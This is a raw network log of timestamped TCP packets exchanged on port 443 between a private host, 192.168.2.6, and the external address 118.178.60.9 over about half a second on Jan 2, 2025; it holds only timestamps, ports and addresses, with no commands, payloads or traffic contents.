Jan 2, 2025 12:15:36.625467062 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.625524998 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.629724026 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.629787922 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.631952047 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.632009029 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.636173964 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.636238098 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.638427973 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.638484001 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.640602112 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.640667915 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.644654989 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.644710064 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.646858931 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.646945953 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.651156902 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.651215076 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.653194904 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.653250933 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.657475948 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.657532930 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.659712076 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.659771919 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.661889076 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.661947966 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.665894032 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.665954113 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.668139935 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.668204069 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.672400951 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.672466993 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.674628019 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.674686909 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.676675081 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.676734924 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.680824995 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.680886030 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.683087111 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.683147907 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.687293053 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.687356949 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.689460993 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.689523935 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.691478014 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.691540003 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.695739985 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.695801020 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.697978973 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.698041916 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.702178001 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.702234030 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.704608917 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.704672098 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.708231926 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.708291054 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.710208893 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.710289955 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.712255955 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.712322950 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.715967894 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.716049910 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.718084097 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.718144894 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.721678019 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.721748114 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.723557949 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.723618031 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.725497007 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.725559950 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.729094982 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.729149103 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.730984926 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.731044054 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.734546900 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.734617949 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.736300945 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.736361027 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.737937927 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.737991095 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.742031097 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.742091894 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.744132996 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.744193077 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.748420954 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.748480082 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.748548031 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.748603106 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.752891064 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.752940893 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.756889105 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.756948948 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.756995916 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.757042885 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.761298895 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.761338949 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.761352062 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.761363029 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.761389971 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.761409044 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.767601013 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.767654896 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.767811060 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.767899036 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.772027969 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.772083044 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.778206110 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.778260946 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.778426886 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.778485060 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.798897028 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.798952103 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.865823984 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.865932941 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.867239952 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.867302895 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.869220018 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.869292974 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.873684883 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.873759985 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.875639915 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.875710964 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.880265951 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.880373955 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.882462025 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.882524967 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.884685993 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.884748936 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.888952017 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.889034033 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.891472101 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.891541004 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.895323038 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.895399094 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.897278070 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.897327900 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.901463032 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.901529074 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.903877020 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.903929949 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.906003952 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.906065941 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.910058022 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.910190105 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.912211895 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.912345886 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.916486025 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.916568041 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.918582916 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.918638945 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.920905113 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.920958042 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.925108910 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.925184011 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.927076101 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.927130938 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.931457043 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.931514978 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.933598995 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.933651924 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.936253071 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.936332941 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.937499046 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.937549114 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.938824892 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.938874006 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.941303968 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.941356897 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.942734957 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.942784071 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.945168972 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.945230007 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.946444988 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.946508884 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.947860956 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.947911024 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.954780102 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.954812050 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.954844952 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.954857111 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.954869032 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.954905033 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.958364964 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.958434105 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.964555025 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.964646101 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.964658022 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.964731932 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.968945980 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.969018936 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.969090939 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.969141006 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.977372885 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.977433920 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.977447033 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.977494955 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.989702940 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.989777088 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:36.989816904 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:36.989947081 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.006366014 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006438971 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006577015 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.006603003 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006627083 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006763935 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.006763935 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.006782055 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006802082 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006836891 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.006848097 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006885052 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006897926 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.006917953 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.006927013 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006952047 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006954908 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.006982088 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.006982088 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.006990910 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.007004023 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.007034063 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.007196903 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.007246017 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.011873960 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.011918068 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.011972904 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.011972904 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.011995077 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.012049913 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.017951965 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.018018961 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.018058062 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.018058062 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.018085003 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.018136978 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.024466991 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.024522066 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.024660110 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.024660110 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.024673939 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.024714947 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.027234077 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.027282953 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.027343988 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.027389050 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.032211065 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.032295942 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.032346010 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.032394886 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.035029888 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.035079002 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.035120964 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.035168886 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.038820028 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.038868904 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.038893938 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.038913012 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.038933039 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.038953066 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.045733929 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.045778036 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.045814991 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.045819998 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.045845985 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.045874119 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.055517912 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.055584908 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.055649996 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.055792093 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.059950113 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.060033083 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.060101986 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.060163021 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.068342924 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.068401098 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.068499088 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.068547964 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.080646038 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.080719948 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.080785990 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.080919027 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.097331047 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.097420931 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.097455025 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.097584009 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.097589016 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.097594976 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.097640038 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.097860098 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.097897053 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.097927094 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.097933054 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.097942114 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.097971916 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.098051071 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.098097086 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.098417997 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.098463058 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.098598003 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.098644972 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.102818012 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.102850914 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.102864981 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.102869034 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.102890968 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.102922916 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.109206915 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.109263897 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.109306097 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.109313011 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.109333992 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.109350920 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.115365028 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.115431070 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.115530968 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.115576982 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.118184090 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.118242025 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.118247032 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.118256092 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.118289948 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.118302107 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.123164892 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.123233080 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.123368025 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.123414993 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.126095057 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.126126051 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.126143932 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.126149893 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.126161098 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.126192093 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.129776001 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.129822016 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.129987955 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.130033970 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.136636019 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.136686087 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.136780977 CET	443	49996	118.178.60.9	192.168.2.6
